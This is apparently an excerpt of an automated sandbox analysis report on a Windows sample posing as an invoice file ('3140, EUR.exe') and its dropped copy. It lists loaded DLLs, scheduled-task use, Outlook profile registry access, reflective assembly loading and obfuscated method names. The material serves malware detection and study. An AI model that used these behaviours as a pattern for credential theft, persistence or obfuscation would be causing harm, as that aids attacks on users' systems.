                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\3140, EUR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\3140, EUR.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: 3140, EUR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 3140, EUR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: 3140, EUR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: OqNV.pdb source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
                    Source: Binary string: OqNV.pdbSHA256/{ source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
                    Source: Binary string: OqNV.pdb|D source: 3140, EUR.exe, 00000000.00000002.1740034846.000000000741E000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs.Net Code: Y98Z3ocCGC System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.3140, EUR.exe.3831c20.2.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs.Net Code: Y98Z3ocCGC System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs.Net Code: Y98Z3ocCGC System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.3140, EUR.exe.7600000.4.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07857080 pushad ; ret 0_2_07857081
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07857082 push esp; ret 0_2_07857089
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07853E78 push eax; mov dword ptr [esp], ecx0_2_07853E7C
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_01080D92 pushfd ; iretd 9_2_01080DF9
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_01080DFA pushfd ; iretd 9_2_01080DF9
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763B7CC push esp; iretd 9_2_0763B7CD
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763B7DD push ebp; iretd 9_2_0763B7DE
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763B7B5 push ebx; iretd 9_2_0763B7B7
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763766B push ebp; iretd 9_2_07637672
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07637633 push ebp; iretd 9_2_07637642
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076376AF push esi; iretd 9_2_076376B2
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07637693 push esi; iretd 9_2_076376A2
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076375C3 push ebx; iretd 9_2_076375D2
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763B5C1 push esp; iretd 9_2_0763B5C3
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076375D3 push esp; iretd 9_2_07637602
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076375B3 push ebx; iretd 9_2_076375C2
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763B5B0 push ebp; iretd 9_2_0763B5B1
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763E1CB push esp; iretd 9_2_0763E1D6
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763BC67 push esi; iretd 9_2_0763BC68
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763BC78 push esp; iretd 9_2_0763BC7A
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763BC55 push ebx; iretd 9_2_0763BC57
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763BC3F push ebx; iretd 9_2_0763BC41
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763BBE4 push esp; iretd 9_2_0763BBE6
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763BBD3 push esi; iretd 9_2_0763BBD4
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763BA71 push esp; iretd 9_2_0763BA72
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763BAA9 push esp; iretd 9_2_0763BAAB
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763BA98 push esi; iretd 9_2_0763BA99
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763B8F0 push ebx; iretd 9_2_0763B8F2
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763B8C9 push esp; iretd 9_2_0763B8CB
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763B8A7 push esp; iretd 9_2_0763B8A8
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763B8B8 push esi; iretd 9_2_0763B8B9
                    Source: 3140, EUR.exeStatic PE information: section name: .text entropy: 7.773152694651227
                    Source: lkuPOyvaWlIu.exe.0.drStatic PE information: section name: .text entropy: 7.773152694651227
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, r35OtXmVa9mbccyjMN.csHigh entropy of concatenated method names: 'GqN9A6Nu4o', 'HY99ceitjo', 'u7h9UpcmJd', 'QAh9J9v5fP', 'sI097b0Rns', 'FDm9xINIbs', 'WmU9dkDDfS', 'jLg9LqBfYT', 'nM690fTZBY', 'Vjv9GF6unO'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, IaNmoTU1Jas5HiM3Qc.csHigh entropy of concatenated method names: 'NU9tFHp9wM', 'Xt3tgqpOUW', 'vkatny9ZeY', 'XkXtOZyo7N', 'Nr4t68apne', 'UotnEQ2NDd', 'KPLnuglZau', 'pI9nS9V4XI', 'EROnqWn4Rf', 'LBmnKpfMWa'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, pnbAqGRE0nfnZVOLAq.csHigh entropy of concatenated method names: 'WDZnhGnyPl', 'HKUnencVPS', 'D67P2SMoNA', 'vcMP7nDIYp', 'EwsPxs5dK3', 'bEvPNTTeCZ', 'iILPdy2bA8', 'LqGPLuxKGj', 'McWPMhMmAC', 'O11P0RNTOw'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, DgRGmDbjU6lUJhfE0v8.csHigh entropy of concatenated method names: 'Q4gIobQTJ8', 'KWNIHTEJ1U', 'iuTI30J0uV', 'CiDIiyiTDd', 'pixIhySfPL', 'yvtITgMiJD', 'yvGIe5ejf5', 'WcOIAwXiq2', 'vYwIctymfh', 'KTPIRN74xQ'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.csHigh entropy of concatenated method names: 'mDC1F5ltau', 'tjx1yOlwS4', 'kwD1gP2LKW', 'c9a1PyosR3', 'Vvd1n0hi5L', 'ntV1tj2eIq', 'kQM1Oy0TGk', 'p6b1692Csb', 'e8b1rosvOx', 'xQZ1WkV8GJ'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, clSYfYveg2noAM7P8e.csHigh entropy of concatenated method names: 'zaw3vYJ4j', 'o7ZixLHgG', 'slFT8l8fa', 'LsreWu3f4', 'PJ4cWU7FJ', 'oYXRUeRCt', 'jUvTWwDYFDErknv2Yj', 'N69VBpyC4Pe0SVqBKs', 'PALagLMvR', 'rmbQ5Ef4Z'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, k9RBG6DgUfX4TknVHW.csHigh entropy of concatenated method names: 'pwGIbi3Nr6', 'o5QI1qmcrr', 'xXSIZjhFbH', 'z32IyPorgr', 'HShIgQ5IfA', 'D1FInV51O6', 'NjuItTFKqN', 'qjraScI4Pl', 'pXJaq1RNdP', 'c0ZaKLWkId'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, DZt0vvzJwZJilcpPKx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4dI9t8Yp5', 'c46IwoIdLE', 'RDHIfjAALG', 'djaI88TWbu', 'geSIaX9G3U', 'kLBIIiUOlY', 'tb5IQs107j'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, okXpofgYeVULwIjxF3.csHigh entropy of concatenated method names: 'Dispose', 'G9xbKnYpPX', 'NIUvJBjByq', 'z3Ell8RTx7', 'V1xbDJt6jq', 'N6XbzAko1d', 'ProcessDialogKey', 'qIhvjNDjby', 'UiDvbpGcvS', 'lK6vv69RBG'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, MU4Oupc1dL6Nvwl4EF.csHigh entropy of concatenated method names: 'UZlPi1EFky', 'kMwPTrTb3E', 'S4tPAfFKQV', 'TkpPcjHuyO', 'OVhPwQ9Mkf', 'tNNPfSRpkZ', 'sbQP8yc3h0', 'Bk6PabtRGE', 'GfyPIUPLvy', 'e1nPQIS6uG'
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, jHN6pNdJjWN1aRaPiD.csHigh entropy of concatenated method names: 'PPWOy6bVhC', 'ATAOPMst2D', 'UucOtTDklA', 'kHRtDnXeDV', 'd6jtz6Flk8', 'nuBOj4JCNs', 'CMIObyGNWb', 'wN0OvguPFP', 'PfRO1xE4ao', 'zHDOZLdog4'
